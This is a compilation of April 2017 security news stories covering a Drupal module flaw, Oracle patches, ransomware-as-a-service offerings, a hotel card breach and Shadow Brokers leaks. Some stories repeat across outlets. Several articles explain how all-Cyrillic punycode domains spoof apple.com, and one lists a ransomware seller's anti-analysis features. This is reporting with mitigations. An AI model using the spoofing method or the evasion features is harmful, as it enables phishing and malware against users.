The Drupal team published a Security advisory on April 12 informing its users of the critical flaw.

The flaw has a huge impact on the Drupal community because the affected module is currently used by more than 121,000 websites.

“The module is currently used by over 120 000 individual Drupal installations, but is no longer maintained. The last update was done in February 2013. Unfortunately, a critical security vulnerability in this references module has been reported by the Drupal core security team as SA-CONTRIB-2017-38:

Please note, the security team will not release information on this vulnerability for up to a month, the recommendation is to migrate. Emails asking for details on the vulnerability will not be responded to. If you would like to maintain the module, please follow the directions below.

” states Drupal.

The References module allows users to add references between nodes for more complex information architectures.

The module was initially flagged by the Drupal development team as unsupported, its last update was provided in February 2013.

The good news for References users is that, on April 14, the Drupal security team announced it was assigned to a new maintainer.

“2017-04-14 – A potential new maintainer is working through the process of fixing the References module. When this is complete a new release will be published and this SA will be updated.” reads the advisory.

A few days later, on April 18 the problem has been fixed with the release of references 7.x-2.2.

References module

The Drupal security team did not disclose the technical details about the vulnerability in order to avoid the exploitation of the flaw in the wild. Unfortunately, it will very difficult to upgrade websites heavily using the Reference module.

“With a critical issue in an unsupported module so widely used, it is almost guaranteed that a large number of sites will be subject to attacks using this as a vector.” states Drupal. “Given the tradition of Drupal doing big backward breaks with regards to compatibility, some sites might be difficult to upgrade. Upgrading an enterprise site heavily using References may simply be impossible and hopefully drive the module to be maintained by a corporate entity.”

Drupal will release information on the critical vulnerability in the next few weeks.

Security experts believe threat actors could find the vulnerability by analyzing the source code of the module and could develop and exploit.

Drupal CMS is a privileged target for hackers that try to exploit vulnerabilities in the out-dated plugin.

In June 2016, security experts warned of the Drupalgeddon attacks against Drupal websites, more than 19 months after the public disclosure of the CVE-2014-3704.


Oracle Patches Record Number of Vulnerabilities

19.4.2017 securityweek  Vulnerebility
Oracle’s Critical Patch Update (CPU) for April 2017 contains 299 fixes, the highest number compared to previous CPUs.

More than half of the vulnerabilities could be remotely exploitable without authentication. 40 of the issues were rated Critical, and 25 had a CVSS score of 10.

Oracle Financial Services Applications was the most affected product, receiving fixes for 47 vulnerabilities this month, with 19 of them rated critical with a CVSS score of 10. Aditionally, 25 of the 47 vulnerabilities may be remotely exploitable without authentication, Oracle’s advisory reveals.

Oracle CPU April 2017Released this week, Oracle latest CPU addressed vulnerabilities in 25 applications: MySQL and Retail Applications (39 fixes each), Fusion Middleware (31), Sun Systems Products Suite (21), PeopleSoft (16), Virtualization (15), Berkeley DB (14), Support Tools (13), E-Business Suite (11), Communications Applications (11), Java SE (8), Utilities Applications (7), Primavera Products Suite (7), Hospitality Applications (6), Commerce (3), Database Server (2), Enterprise Manager Grid Control (2), and Secure Backup, Hyperion, Supply Chain Products Suite, JD Edwards Products, Siebel CRM, Health Sciences Applications, and Insurance Applications (1 each).

The most important of the addressed issues are related to the Remote Code Execution flaw in Apache Struts 2 that was found last month to be exploited in the wild after someone published a proof-of-concept (PoC) exploit. Cisco and VMWare products were impacted as well.

“Cybercrime has always been a lucrative business. Nowadays, hackers set their eyes on enterprises more than on individuals, as they understood that it is more profitable. Taking into account that Oracle’s products are installed in the largest enterprises, these applications can be the ultimate target. The good news is that the vendor drew its attention to this critical area before a serious data breach happens. The bad news is that Oracle admins will long work on installing numerous patches,” Alexander Polyakov, CTO at ERPScan, says.

Oracle addressed critical bugs in the Solaris component of Oracle Sun Systems Products Suite, MySQL Enterprise Monitor component of Oracle MySQL (Struts 2), Oracle FLEXCUBE Private Banking component of Oracle Financial Services Applications (Struts 2), Oracle Financial Services Asset Liability Management component of Oracle Financial Services Applications (Struts 2), and Oracle Financial Services Data Integration Hub component of Oracle Financial Services Applications (Struts 2).

Over the past several quarters, Oracle has been patching an increasingly higher number of vulnerabilities with each new CPU. With 276 patches, the July 2016 CPU was the first to include over 250 fixes, but the trend continued each quarter since, with 253 flaws addressed in October 2016, and 270 in January 2017.

The trend is expected to continue in the following quarters as well. However, as it usually happens with all software, this doesn’t mean the applications are becoming more vulnerable, but that the researcher community is getting better at finding security issues.


Many Cybercriminals Prefer Skype for Communications: Study

19.4.2017 securityweek  CyberCrime
Cybercriminals are increasingly interested in ensuring that their communications are encrypted, and the favorite tool of many appears to be Microsoft’s Skype, according to a new report from threat intelligence firm Flashpoint.

Data collected by Flashpoint from deep and dark web cybercrime communities between 2012 and 2016 shows that ICQ, Skype, Jabber, PGP, AOL Instant Messenger, Telegram, WeChat, QQ, WhatsApp, and Kik have been the most widely used tools.

The company’s study is based on the number of mentions on Russian, Spanish, French, Arabic, Chinese, Persian (Farsi) and English language forums typically used by profit-driven cybercriminals. The study does not include Signal and Line due to the fact that these are common words in English and programming languages, but experts believe their usage by threat actors is insignificant.

An analysis of Russian underground websites showed that ICQ was the most popular back in 2012 and accounted for more than half of mentions. Skype and Jabber also accounted for 26% and 19% of mentions, respectively. By 2016, Skype became the most mentioned messaging tool, with Jabber and ICQ dropping to the second and third positions.

On Spanish-speaking forums, Skype was in the lead in 2012, but last year it dropped to second place. The most mentioned messaging platform in 2016 was ICQ, with more than half of mentions.

Researchers believe ICQ has become more popular among Spanish-speaking cybercrooks due to the influence of more sophisticated hackers from Russian communities. In fact, Russian actors are considered the most innovative and sophisticated, and they are often trendsetters.

As for French-speaking communities, PGP was the most referenced in 2012, with nearly 60% of the total mentions. While not actually a messaging service, Forcepoint decided to include it in its study due to its popularity.

PGP continued to be popular on the French underground, but Jabber took the lead in 2016. Experts believe cybercriminals had started using it alongside PGP.

Skype was the most popular on Arabic-language forums back in 2012. WhatsApp was the most referenced last year, but Skype still managed to remain one of the favorites.

The situation has been different in China, where cybercriminals prefer applications developed by local tech company Tencent. Its QQ and WeChat apps accounted for more than 90% of mentions, both in 2012 and last year.

Persian-language communities also don’t appear to be influenced by others as much. In 2012, Yahoo Messenger was the most popular, and the favorite in 2016 was Telegram, with nearly 90% of all mentions. It’s worth noting that Flashpoint’s analysis of the Iranian underground is more general and it does not focus on financially motivated cybercrime.

On English-language underground websites, Skype was and remains the most mentioned application. In fact, Skype appears to be the most popular overall, being included in the top five messengers in all language groups.

According to Flashpoint, its study also shows that cybercriminals are increasingly interested in encrypted communications, a trend that is likely due to recent revelations of NSA surveillance, the proliferation of secure chat apps, and the influence of more sophisticated actors.

“The results of this study underscore the interconnected, agile nature of the cybercriminal ecosystem. Regardless of their language, skills, location, or a liation, cybercriminal groups tend to share a strong desire to reap the benefits of cross-community collaboration, information sharing, and even mentorship,” Flashpoint said in its report.

“Such activities necessitate consistent access to reliable means of communication, which is why the digital communication tools examined within this study play such an integral role in facilitating cybercriminal behavior. In many instances, a cybercriminal’s livelihood may depend on his or her ability to communicate with peers while evading third-party detection. As such, the decision to utilize one communication tool over others is not taken lightly and often influenced by numerous contextual social, cultural, and geopolitical factors,” the company added.


Kaspersky Adds Password Manager to Bug Bounty Program

19.4.2017 securityweek  Vulnerebility
Kaspersky Lab has informed researchers that its bug bounty program has been extended. The company has also decided to add a new product to its program and increase the maximum reward.

Kaspersky launched its HackerOne-powered bug bounty program in August 2016. The first phase, which lasted for six months and promised a total of $50,000 in bounties, led to the discovery of more than 20 flaws.

Given the program’s success so far, the security firm has decided to extend it and make some changes. Bug bounty hunters can now earn rewards for finding vulnerabilities in Kaspersky Password Manager 8. Until now, only Kaspersky Internet Security 2017 and Kaspersky Endpoint Security 10 were in scope.

The security firm also announced that the maxim reward for remote code execution vulnerabilities has been increased from $2,000 to $5,000. White hat hackers can earn, on average, $1,000 for local privilege escalation flaws and $2,000 for sensitive information disclosure issues. The minimum reward is $300.

“Since August, it is fair to say that our Bug Bounty Program has been successful in optimising our internal and external mitigation measures to continuously improve the resiliency of our products. That’s why we’ve decided to extend it,” said Nikita Shvetsov, Chief Technology Officer at Kaspersky Lab.

“We appreciate the enthusiastic participation of security researchers worldwide. As a mark of our respect for the work they do in helping us to bolster our solutions, we’ve increased the remuneration on offer in this second phase of the program and extended the scope to include other important Kaspersky Lab products,” Shvetsov added.

Google Project Zero researcher Tavis Ormandy has reported finding several vulnerabilities in Kaspersky products in the past years. The most recent, disclosed in January, was related to how the security firm’s products inspect SSL/TLS connections.


Chrome, Firefox Users Exposed to Unicode Domain Phishing

19.4.2017 securityweek Phishing
Malicious actors can create legitimate-looking phishing domains by leveraging the fact that some popular web browsers fail to properly protect their users against homograph attacks.

Web developer Xudong Zheng has demonstrated how an attacker could have registered the domain name “xn--80ak6aa92e.com,” which is displayed by web browsers such as Chrome, Opera and Firefox as “apple.com.”

Unicode is a standard for encoding and representing all characters and glyphs from all languages. Unicode characters can be used in Internet hostnames through Punycode. For instance, the Chinese word “短” is equivalent to “xn--s7y.”

Characters such as the Cyrillic “а” and the Latin “a” may look the same, but they are represented differently in Punycode, allowing malicious actors to create domains where Latin letters are replaced with similar-looking Greek or Cyrillic characters. This is known as an internationalized domain name (IDN) homograph attack.

Modern web browsers are designed to prevent these types of attacks – for example, "xn--pple-43d.com" will be displayed as "xn--pple-43d.com" instead of “apple.com.” However, Zheng discovered that this filter can be bypassed in Chrome, Firefox and Opera by creating the entire domain name using Cyrillic characters, leading to "xn--80ak6aa92e.com” being displayed as “apple.com.”

For a proof-of-concept (PoC), the expert registered the domain “xn--80ak6aa92e.com” and obtained a free digital certificate for it from Let’s Encrypt. When the domain is accessed via Opera, Chrome or Firefox, the user sees the domain name “apple.com” with a certificate issued for “apple.com.”

Wordfence has demonstrated the attack technique by spoofing the healthcare website “epic.com,” and experts at SANS have also provided some examples.

Zheng reported his findings to Google and Mozilla on January 20, and while the upcoming Chrome 58 will resolve the issue, Mozilla is still trying to figure out how to address the problem.

Mozilla initially classified the vulnerability report as “WONTFIX,” but later reopened it and assigned it a low severity rating. Until the organization comes up with a fix, Firefox users can protect themselves against potential attacks by typing “about:config” in the address bar to access advanced settings, and changing the “network.IDN_show_punycode” preference to “true.”

Edge, Internet Explorer and Safari are not affected. However, it’s worth noting that researchers did report recently that cybercriminals had been targeting Office 365 business email users by exploiting a weakness in how Office 365 handles Punycode.


Karmen Ransomware Deletes Decryptor If Sandbox is Detected

19.4.2017 securityweek Ransomware

Karmen Ransomware Deletes Decryptor Component When Detecting a Sandbox Environment or Analysis Software

A recently discovered Hidden Tear ransomware offspring is being sold on underground forums as a Ransomware-as-a-Service (RaaS), priced at just $175, Recorded Future researchers reveal.

Dubbed Karmen, the malware appears to have been around since December 2016, when incidents involving it were reported in Germany and the United States. However, the threat started being advertised on underground forums only in March.

After having a closer look at the malware, Recorded Future security researchers discovered that it is derived from the Hidden Tear open source ransomware. They also found out that Karmen was using the AES-256 encryption protocol for the encryption of targeted files on the local machine.

Just as any other ransomware, the threat displays a ransom note with instructions for the victim to pay a specific sum of money to obtain the decryption key. Unlike other similar threats, however, the malware automatically deletes the decryptor when detecting a sandbox environment or analysis software.

Wannabe-criminals buying the ransomware are provided the option to change various settings courtesy of a control panel that doesn’t require advanced technical knowledge to operate. They can also track infected systems via a “Clients” page. A Dashboard offers information such as the number of infected machines, earned revenue, and available updates for the malware.

Karmen is a multi-threaded, multi-language piece of ransomware that supports .NET 4.0 and newer versions and features an adaptive admin panel, researchers say. The malware can encrypt all discs and files, automatically deletes the loader, and features sandbox, debugger, and virtualization detection. Karmen can delete itself after ransom is paid, but also deletes the decryptor if it detects it is being analyzed.

The threat is sold in two versions, namely Light and Full. The former only includes obfuscation and autoloader, while the latter also packs the anti-analysis detection capabilities. While .NET dependent, the malware also requires PHP 5.6 and MySQL.


Flaw in Drupal Module Exposes 120,000 Sites to Attacks

19.4.2017 securityweek Vulnerebility
A critical vulnerability has been found in a Drupal module used by many websites. While the flaw has been fixed, Drupal developers initially advised users to migrate as the affected module had not been updated for several years.

The Drupal security team informed users on April 12 that the third-party module named References was affected by a critical security hole. The module, currently used by more than 121,000 websites, allows users to add references between nodes for more complex information architectures.

References was initially flagged by Drupal developers as unsupported due to the fact that it had received its last update in February 2013. However, on April 14, the Drupal security team announced that they may have found a new maintainer for the module.

On Tuesday, Drupal announced that the vulnerability has been fixed with the release of References 7.x-2.2, which also includes new features and bug fixes.

Drupal’s security team has not released any information on the vulnerability to prevent exploitation, but experts are concerned that malicious actors could manage to find the flaw on their own by analyzing the source code. Drupal said it will release information on this weakness in the next few weeks.

While the References module appears to have found a new maintainer, Drupal website owners can also try out Entity Reference, a module that provides similar functionality. A special module is available for migrating from References to Entity Reference.

Hackers have been known to target Drupal websites using vulnerabilities in third-party modules. Last year, researchers started seeing attempts to exploit a RESTWS module flaw two months after it had been patched.

The most well-known Drupal vulnerability is the one dubbed “Drupalgeddon,” which had still been exploited nearly two years after a patch was released.


InterContinental Hotels Group, the international hotel chain confirmed a second credit card breach
19.4.2017 securityaffairs Incindent

The InterContinental Hotels Group announced that last week payment card systems at more than 1,000 of its hotels had been compromised by crooks.
The multinational hotel chain owns prestigious brands like Holiday Inn and Crowne Plaza.

This is the second time that the InterContinental Hotels Group suffers a credit card breach, early this year the hotel chain informed its customers that payment cards used between August and December 2016, at restaurants and bars of the 12 US hotels were affected by the data breach. The affected properties include the InterContinental San Francisco and Holiday Inn Resort – Aruba, the InterContinental Chicago Magnificent Mile.

On Friday the company published on its website a credit card breach notification informing it customers that a second breach occurred at select hotels between Sept. 29 and Dec. 29 last year.

“Many IHG-branded locations are independently owned and operated franchises, and certain of these franchisee operated locations in the Americas were made aware by payment card networks of patterns of unauthorized charges occurring on payment cards after they were legitimately used at their locations. To ensure an efficient and effective response, IHG hired a leading cyber security firm on behalf of franchisees to coordinate an examination of the payment card processing systems of franchise hotel locations in the Americas region.” reads the announcement published by the InterContinental Hotels Group.

“The investigation identified signs of the operation of malware designed to access payment card data from cards used onsite at front desks at certain IHG-branded franchise hotel locations between September 29, 2016 and December 29, 2016. Although there is no evidence of unauthorized access to payment card data after December 29, 2016, confirmation that the malware was eradicated did not occur until the properties were investigated in February and March 2017. “

The company highlighted that there’s no evidence payment card data was accessed after that some payment systems have been compromised with a malware.

The malware that infected the systems at the InterContinental Hotels Group was able to siphon credit card data from track in the magnetic strip (i.e. customers’ card number, expiration date, and internal verification code).

“The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the affected hotel server. There is no indication that other guest information was affected. ” continues the credit card breach notification.

It is still unclear the number of properties affected by the second breach, customers can use a free web tool published by the company to search for potentially affected hotels in select states (US and Puerto Rico) and cities.

Data managed by the online tools suggests that more than a thousand hotels were affected by the incident.

The company confirmed that the investigation is still and it will update periodically data provided by the tool according to its findings.

The bad news is that several properties don’t participate in the investigation.

In response to the incidents, the company is improving security of its payment systems in order to repel malware-based attacks.

The hotels affected by this second breach had not yet implemented the announced improvement.

“Before this incident began, many IHG-branded franchise hotel locations had implemented IHG’s Secure Payment Solution (SPS), a point-to-point encryption payment acceptance solution. Properties that had implemented SPS before September 29, 2016 were not affected. Many more properties implemented SPS after September 29, 2016, and the implementation of SPS ended the ability of the malware to find payment card data and, therefore, cards used at these locations after SPS implementation were not affected. ” reads the announcement.


Homograph Phishing Attacks are almost impossible to detect on major browsers
19.4.2017 securityaffairs Phishing

The Chinese security Xudong Zheng is warning of Homograph Phishing Attacks are “almost impossible to detect” also to experts.
The Chinese security researcher Xudong Zheng has devised a phishing technique that is “almost impossible to detect.”

Hackers can exploit a known vulnerability in the popular web browsers Chrome, Firefox and Opera to display to the users fake domain names as apparently legitimate services, like Apple and Google.

This attack is known as homograph attack, hackers can register domains such as “xn--pple-43d.com”, which is equivalent to “аpple.com”. This is possible if the address uses a foreign language, for example using the Cyrillic “а” (U+0430) rather than the ASCII “a” (U+0041).

To give you an idea of the technique reported by Zheng give a look at this demo web page created by the expert.

Well it displays in the address bar the URL

https://www.apple.com/

and also uses the HTTPs protocol.

However, if you try to copy and paste the URL in another page you will see the following address:

https://www.xn--80ak6aa92e.com/

So, in case the displayed page is a clone of the legitimate page there is no reason to doubt regarding its authenticity.

Homograph Phishing Attacks

Despite the Homograph attack has been known since 2001, major browsers still haven’t solved the issue and are still vulnerable to Homograph Phishing Attacks.

“Chrome’s (and Firefox’s) homograph protection mechanism unfortunately fails if every characters is replaced with a similar character from a single foreign language. The domain “аррӏе.com”, registered as “xn--80ak6aa92e.com”, bypasses the filter by only using Cyrillic characters.” Xudong Zheng said in a blog post. “You can check this out yourself in the proof-of-concept using Chrome or Firefox. In many instances, the font in Chrome and Firefox makes the two domains visually indistinguishable. It becomes impossible to identify the site as fraudulent without carefully inspecting the site’s URL or SSL certificate. This program nicely demonstrates the difference between the two sets of characters. Internet Explorer and Safari are fortunately not vulnerable.”

Anther PoC page was created by researchers at security firm Wordfence, in this case, the experts spoofed the “epic.com” domain.

Major web browsers use ‘Punycode’ encoding by default to represent Unicode characters in the URL.

Punycode converts Unicode characters to the limited character set of ASCII (A-Z, 0-9), supported by International Domain Names (IDNs) system.
The Chinese domain “短.co” is represented in Punycode as “xn--s7y.co“. The xn-- prefix, aka ‘ASCII compatible encoding’ prefix, indicates web browser that the domain uses ‘punycode’ encoding to represent Unicode characters.

The flaw reported by the Chinese researcher could be exploited to register a domain having characters that are interpreted by major browsers in the wrong way. This trick could allow bypassing phishing protections implemented by several browsers, including Chrome, Firefox, and Opera.

Zheng reported this issue to the affected browser vendors early this year. Google has solved the problem in the experimental Chrome Canary 59 and will release a stable fix with the release of Chrome Stable 58.

The only way to prevent the Homograph Phishing Attacks is to disable Punycode support in your web browsers waiting for a fix, unfortunately only Firefox allows it.

“Firefox users can limit their exposure to this bug by going to about:config and setting network.IDN_show_punycode to true. This will force Firefox to always display IDN domains in its Punycode form, making it possible to identify malicious domains. Thanks to /u/MARKZILLA on reddit for this solution.” wrote Zheng.

“A simple way to limit the damage from bugs such as this is to always use a password manager. In general, users must be very careful and pay attention to the URL when entering personal information. I hope Firefox will consider implementing a fix to this problem since this can cause serious confusion even for those who are extremely mindful of phishing.”


Karmen Ransomware, a cheap RaaS service that implements anti-analysis features
18.4.2017 securityaffairs Ransomware

Experts at Recorded Future have discovered a cheap RaaS, the Karmen Ransomware that deletes decryptor if detects a sandbox.
Security experts from threat intelligence firm Recorded Future have spotted a new ransomware as a service (RaaS) called Karmen. The service allows customers to easy create their ransomware campaign in a few steps and without specific skills.

Wannabe-crooks also track infected systems via a “Clients” tab, the Dashboard implements an efficient and easy to use cockpit that include various information such as the number of infected machines, earned revenue, and available updates for the malware.

The Karmen RaaS is very cheap, it costs just $175, buyers can decide the ransom prices and the duration of the period in which the victims can pay the ransom.

The Karmen ransomware is based on the open-source ransomware Hidden Tear, which was released in August 2015 by the Turkish security researchers Utku Sen for educational purposes.

The first Karmen infections were reported in December 2016, the malware infected machines in Germany and the United States.

The Karmen ransomware is a multi-threaded and multi-language ransomware that supports .NET 4.0 and uses the AES-256 encryption standard.

The malware is .NET dependent and requires PHP 5.6 and MySQL.

“On March 4, 2017, a member of a top-tier cyber criminal community with the username “Dereck1” mentioned a new ransomware variant called “Karmen.” reported a blog post published by Recorded Future.

“Further investigation revealed that “DevBitox,” a Russian-speaking cyber criminal, was the seller behind the Karmen malware on underground forums in March 2017.”

“However, the first cases of infections with Karmen were reported as early as December 2016 by victims in Germany and the United States.”

Once infected a machine, the ransomware displays a ransom note with payment instructions, unlike similar malware, the Karmen ransomware automatically deletes the decryptor when detecting a sandbox environment or any other analysis software.

“A notable feature of Karmen is that it automatically deletes its own decryptor if a sandbox environment or analysis software is detected on the victim’s computer.” continues the blog post.

Below the list of ransomware features provided by DevBitox:

Multi-threaded
Multi-language
Supports .NET 4.0 and newer versions
Encryption algorithm: AES-256
Adaptive admin panel
Encrypts all discs and files
Separate BTC wallet for each victim
Small size
Automatic deletion of loader
Automatic deletion of malware (after payment was received)
Minimal connection with control server
Robust control panel
Almost FUD (1/35)
Automatic file decryption after received payment
T2W compatible
File extensions remain the same
Detection of anti-debugger/analyzers/VM/sandbox
Automatic deletion of decryptor if sandbox environment is detected on victim’s computer*
Light version: obfuscation and autoloader only
Full version: detection of analyzing software
The ransomware is available for sale in both light and full versions, the light version doesn’t include anti-analysis features.


Moving threat landscape: The reality beyond the cyberwarfare
18.4.2017 securityaffairs CyberWar

It started quietly as a probability not a reality. Now within months cyberwarfare has become a reality plausible as the air we breathe.
The revelation of governments hacking units has brought light for a new domain of conflict: Cyberwarfare. Once a secret these government agencies were public revealed like the Equation Group as well as the tailored access operations (TAO).

The same tools that are taking place in debates about digital privacy are now operating as you read this, in some digital battle over the internet. This is only the tip of the iceberg and with every disclosure more, we realize that every technology is a risk at bay.

cyberwarfare

Beyond the inevitable costs for the global economy, the risks for human life are as certain as the damage of physical weapons. One simple program can turn a surveillance camera, a cellphone, a television, or anything into a weapon in a network of connected devices that can bring down massively critical infrastructure services.

Nowadays the development of new cryptologic technologies as well as the implementation of information security frameworks, and awareness is the only guarantee the human existence has to protect itself. If we consider the impact of a massive attack on critical infrastructure, we must also consider that every single service will stop and no one will be able to call asking for help.

More disturbing than the impacts of such attacks is the reality that it is already taking place.

The news of North Korea failing to launch a missile due to US Cyber Command attack bring down a new level of threat landscape and theater of operations for information security. Today the human domain is a target on these cyber operations, and apparently, every aspect of society can suffer damages, like hospitals or even the power grid.

We see today a completely new market of jobs and opportunities emerging alongside these threats to protect us from rogue nation state actors. It is necessary to corporations and partners to unite with law enforcement agencies to develop new tools and awareness to the average citizen. A new framework for cyber security, for pre-emptive readiness has to be taking into account as the first priority to every democratic country connected to the internet.

The US sabotage of North Korea missile is not the only news about cyberwarfare. The Mirai botnet and the dangers of IoT are another example of this ongoing threat on a blink of an eye, on a click of a button. As technologies evolve, we also must evolve the countermeasures to detain those threats. The possibility of state actors managing to interfere in democratic republics corroborates the impact in the civil society that can damage a whole nation and the world, as was in the news the Russia interference in Europe.

We are on a verge of a drastic change in awareness and preparedness in the cyber domain, and we must prepare ourselves for this new reality as it reaches out and affects everyone, everywhere. With the development of new technologies of information security, the creation of jobs can be a reality emerging from the chaos of destruction launched upon us as menaces from these rogue states.

It has been the legacy of Computer Science brings humanity to its better and worst in history. As of today, we must change the reality of that by advancing the importance of security and development of new technologies to withstand such menaces with no cost at all of human lives.

Sources:

http://www.bbc.com/news/business-39625468

http://www.telegraph.co.uk/news/2017/04/06/left-of-launch-attacks-may-bringing-north-korean-missiles/

http://www.csoonline.com/article/3190447/security/iot-malware-clashes-in-a-botnet-territory-battle.html#tk.rss_news

http://ndupress.ndu.edu/Media/News/Article/1130649/information-warfare-in-an-information-age/

http://www.defenseone.com/threats/2017/04/chinas-information-warriors-grow-more-disciplined-effective-us-cyber-leaders/136732/

http://cimsec.org/threat-defense-control-cyber-warfare/32106

http://www.bbc.com/news/world-europe-39401637

http://www.matthewaid.com/post/159634985471/north-korea-more-likely-to-launch-cyberattack-than


The alleged link between the Shadow Brokers data leak and the Stuxnet cyber weapon
18.4.2017 securityaffairs BigBrothers

Security researchers who analyzed the documents and hacking tools included in the last Shadow Brokers dump found a link to the Stuxnet virus.
On Friday, the Shadow Brokers leaked a new bunch of files belonging to the alleged NSA arsenal.

Security researchers who analyzed the documents and hacking tools included in the last dump have discovered many exploits specifically designed to compromise Windows systems.

Digging the archive, experts spotted a surprising exploit that was used in the Stuxnet cyber weapon, the malware used to destroy the Iranian nuclear programme in the Natanz plant.

According to Symantec researcher Liam O’Murchu, the exploit was developed for Windows’ MOF files and it is “almost the exact same script” used in Stuxnet.

“There is a strong connection between Stuxnet and the Shadow Brokers dump,” O’Murchu told Motherboard in an email. “But not enough to definitively prove a connection.”
Let’s see the similarities between the Stuxnet code and the exploit code in the last dump leaked by Shadow Brokers.

Below a portion of the script from Stuxnet.

Stuxnet code vs Shadow Brokers exploit
and this is a portion of the script dumped by The Shadow Brokers.


Of course, who has developed the tool included in the Shadow Brokers dump may have borrowed the script from the public knowledge of Stuxnet. The same code, for example, was included in the Metasploit framework allowing anyone to create a MOF file like the one exploited in Stuxnet attack.

O’Murchu highlighted that the MOF file creation tool in the Shadow Brokers dump presented a last compiled date set on September 9, 2010, a few months Stuxnet discovery, but “shortly before the code was added to Metasploit.”

The researcher Kevin Beaumont believe that there is link between Stuxnet and the exploit shared by Shadow Brokers.

Follow
Kevin Beaumont ✔ @GossiTheDog
lol I think this one I just found is one of the exploits used in Stuxnet, even notes patch num
2:48 PM - 14 Apr 2017
3 3 Retweets 10 10 likes
Lorenzo Franceschi-Bicchierai from Motherboard also reported that the Avast Antivirus detects some exploits in the Shadow Brokers dump as Stuxnet.

It is very curious, even in the case of false positive that the signatures of the exploits match the Stuxnet’s one.

Are we facing with the evidence that the NSA-linked Equation Group was involved in the Stuxnet attack, or is this a well organized false-flag operation?
“Therefore, the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet, as many suspect.” added Bicchierai.


VMware Patches Critical RCE Flaw in vCenter Server

18.4.2017 securityaffairs Vulnerebility

VMware has released patches for its vCenter Server product to address a critical remote code execution flaw that exists due to the use of a vulnerable third-party component.

Earlier this month, CERT/CC informed users that Markus Wulftange, senior penetration tester at Code White, had identified three potentially serious deserialization-related flaws in several Java implementations of AMF3, the latest version of Adobe’s Action Message Format.

The vulnerabilities can be exploited for denial-of-service (DoS) attacks, remote code execution and to obtain sensitive data. The affected software includes Apache’s Flex BlazeDS, Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

One of the BlazeDS vulnerabilities, tracked as CVE-2017-5641, has been found to affect VMware vCenter Server, which uses BlazeDS to process AMF3 messages.

“The issue is present in the the Customer Experience Improvement Program (CEIP) functionality. If a customer has opted out of CEIP the vulnerability is still present. Also opting out will not remove the vulnerability,” VMware said in its advisory.

The security hole affects vCenter Server 6.0 and 6.5; version 5.5 or other VMware products are not impacted. VMware has advised users to apply the 6.5c and 6.0U3b patches to address the vulnerability.

According to CERT/CC, the deserialization vulnerabilities identified by Wulftange could also affect products from HPE and SonicWall.


This Phishing Attack is Almost Impossible to Detect On Chrome, Firefox and Opera

18.4.2017 thehackernews Phishing

A Chinese infosec researcher has discovered a new "almost impossible to detect" phishing attack that can be used to trick even the most careful users on the Internet.
He warned, Hackers can use a known vulnerability in the Chrome, Firefox and Opera web browsers to display their fake domain names as the websites of legitimate services, like Apple, Google, or Amazon to steal login or financial credentials and other sensitive information from users.
What is the best defence against phishing attack? Generally, checking the address bar after the page has loaded and if it is being served over a valid HTTPS connection. Right?
Okay, then before going to the in-depth details, first have a look at this demo web page (note: you may experience downtime due to high traffic on demo server), set up by Chinese security researcher Xudong Zheng, who discovered the attack.
“It becomes impossible to identify the site as fraudulent without carefully inspecting the site's URL or SSL certificate.” Xudong Zheng said in a blog post.
If your web browser is displaying "apple.com" in the address bar secured with SSL, but the content on the page is coming from another server (as shown in the above picture), then your browser is vulnerable to the homograph attack.
There is another proof-of-concept website created by security experts from Wordfence to demonstrate this browsers' vulnerability. It spoof "epic.com" domain.
Homograph attack has been known since 2001, but browser vendors have struggled to fix the problem. It’s a kind of spoofing attack where a website address looks legitimate but is not because a character or characters have been replaced deceptively with Unicode characters.
Doesn't matter how much aware you're, anyone can fall victim to this "Almost Impossible to Detect" Phishing Attack.
CLICK TO TWEET
Many Unicode characters, which represents alphabets like Greek, Cyrillic, and Armenian in internationalised domain names, look the same as Latin letters to the casual eye but are treated differently by computers with the completely different web address.
For example, Cyrillic "а" (U+0430) and Latin "a" (U+0041) both are treated different by browsers but are displayed "a" in the browser address.
Punycode Phishing Attacks

By default, many web browsers use ‘Punycode’ encoding to represent Unicode characters in the URL to defend against Homograph phishing attacks. Punycode is a special encoding used by the web browser to convert Unicode characters to the limited character set of ASCII (A-Z, 0-9), supported by International Domain Names (IDNs) system.
For example, the Chinese domain "短.co" is represented in Punycode as "xn--s7y.co".
According to Zheng, the vulnerability relies on the fact that web browsers render only Punycode URLs in one language as Unicode (like only Chinese or only Japanese), but they fail if a domain name contains characters from multiple languages.
This loophole allowed the researcher to register a domain name xn--80ak6aa92e.com and bypass protection, which appears as “apple.com” by all vulnerable web browsers, including Chrome, Firefox, and Opera, though Internet Explorer, Microsoft Edge, Apple Safari, Brave, and Vivaldi are not vulnerable.
Here, xn-- prefix is known as an ‘ASCII compatible encoding’ prefix, which indicates web browser that the domain uses ‘punycode’ encoding to represent Unicode characters, and Because Zheng uses the Cyrillic "а" (U+0430) rather than the ASCII "a" (U+0041), the defence approach implemented by web browser fails.
Zheng has reported this issue to the affected browser vendors, including Google and Mozilla in January.

Fake Page (top) and Original Apple.com (bottom), but exactly same URL
While Mozilla is currently still discussing a fix, Google has already patched the vulnerability in its experimental Chrome Canary 59 and will come up with a permanent fix with the release of Chrome Stable 58, set to be launched later this month.
Meanwhile, millions of Internet users who are at risk of this sophisticated hard-to-detect phishing attack are recommended to disable Punycode support in their web browsers in order to temporarily mitigate this attack and identify such phishing domains.
Mitigation For Firefox Users (Not FIX For Chrome)
Firefox uses can follow below-mentioned steps to manually apply temporarily mitigation:
Type about:config in address bar and press enter.
Type Punycode in the search bar.
Browser settings will show parameter titled: network.IDN_show_punycode, double-click or right-click and select Toggle to change the value from false to true.
Unfortunately, there is no similar setting available in Chrome or Opera to disable Punycode URL conversions manually, so Chrome users have to wait for next few weeks to get patched Stable 58 release.
Internet users are always advised to manually type website URLs in the address bar for important sites like Gmail, Facebook, Twitter, Yahoo or banking websites, instead of clicking any link mentioned on some website or email, to prevent against such undetectable attacks.


Who is offering the CradleCore Ransomware as source code?
18.4.2017 securityaffairs Ransomware

CradleCore ransomware is a malware offered in the underground as a source code, instead of the classic ransomware-as-a-service (RaaS) model.
According to the experts at Forcepoint, the author is offering the malware in many Tor-based crime forums as source code allowing crooks to request a customized version of the code.

The CradleCore ransomware is offered by the author as a C++ source code along with the necessary PHP web server scripts and a payment panel, the malware goes for 0.35 Bitcoin (around $400) but the price is negotiable.

